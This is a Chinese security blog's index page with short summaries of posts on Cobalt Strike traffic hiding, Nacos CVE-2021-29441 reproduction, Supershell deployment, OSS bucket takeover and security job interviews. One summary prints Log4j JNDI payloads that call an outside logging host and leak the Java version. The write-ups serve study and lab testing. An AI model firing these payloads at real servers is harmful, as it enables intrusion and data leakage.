摘要:
本博客主要用于个人经验积累和知识分享,如有描述错误问题,请大佬在评论区中指正。 若您利用文章内的技术手段进行任何非法行为,您需自行承担相应后果,作者将不承担任何法律及连带责任。 幽壑 / YouHe / LinkPoc 出生于2001年,现就读于福州某不知名大学 && 北京奇虎360实习,是一名 C 阅读全文
摘要:
fofa搜索语句:product="AliyunOSS" && body="NoSuchBucket" 访问https://hukut.oss-ap-south-1.aliyuncs.com/ 发现 <Code>NoSuchBucket</Code> <HostId>pkdya11syxwyzjce 阅读全文
摘要:
Cobalt Strike特征隐藏和流量加密 因用公司办公网络做安全测试而被XDR捕捉到流量特征故有此篇。 悲报,还被提交了工单。 做安全测试不要用公司网!不要用公司网!不要用公司网! 服务器开启禁Ping 命令: vim /etc/sysctl.conf 添加一行 net.ipv4.icmp_ec 阅读全文
摘要:
Nacos未授权 CVE-2021-29441 环境搭建 环境dockerfile在文末 环境启动 docker-compose up -d 查看下当前的容器 docker ps 漏洞复现 访问Web页面 127.0.0.1:8848 抓包,访问http://127.0.0.1:8848/nacos 阅读全文
摘要:
今天搭建了一下supershell,蛮好用的,推荐一手。 GITHUB地址:https://github.com/tdragon6/Supershell 部署 首先必须要先有一台自己的公网服务器,可以考虑阿里云,腾讯云,华为云,百度云之类的。 然后就开始搭建! 输入命令行,下载解压源码 wget h 阅读全文
摘要:
蛮简单的,拿下offer 中电安科一面 这是一家偏向工控的安全公司 自我介绍 web比较熟的漏洞有哪些?最熟的是哪个? 文件上传呢? 反序列化漏洞了解过吗? 提权接触过吗? 协议通信了解过吗? 你对工控安全有了解吗? 对病毒有多什么研究吗? 可以介绍一下XSS吗? 拒绝服务攻击和分布式拒绝服务攻击有 阅读全文
摘要:
360安全研究一面 ps:中间一半的时候才开始录的,整理了一下后半段的面试问题。中间一半的时候才开始录的,整理了一下后半段的面试问题。 自我介绍 sqlmap针对时间盲注该用什么参数? MSF使用上的流程? 你经常用MSF的用来做什么? 内网里不出网,如何搭建隧道? 如果说内网里拿到层层主机,如何配 阅读全文
摘要:
更新一下笔记中JAVA的几个知名的反序列化漏洞,仅漏洞poc和原理,无分析过程。 Log4j 条件:出网(因为需要请求jndi服务器) ${jndi:ldap://yuvs2b.ceye.io} //外带请求 ${jndi:ldap://${java:version}.f2478a5a.ipv6.1 阅读全文
摘要:
本文作者幽壑,本文属于i春秋原创激励计划,欢迎师傅们标明出处转载,一同交流。 https://bbs.ichunqiu.com/thread-63574-1-1.html 国护夜班实在太无聊了,半夜燥热,客户还偷偷藏我们项目经理买的零食,哎,浅浅摸个鱼 打个ctfshow内网靶场。 记一次步履艰辛的 阅读全文
摘要:
本篇文章作者幽壑,本文属i春秋原创奖励计划,未经许可禁止转载。 https://bbs.ichunqiu.com/thread-63544-1-1.html 记一次PHP路由审计 工具:Seay源代码审计系统 0x1 反射型xss 首先进行一个自动化扫描,根据结果进行跟进排查 跟进/user/tpl 阅读全文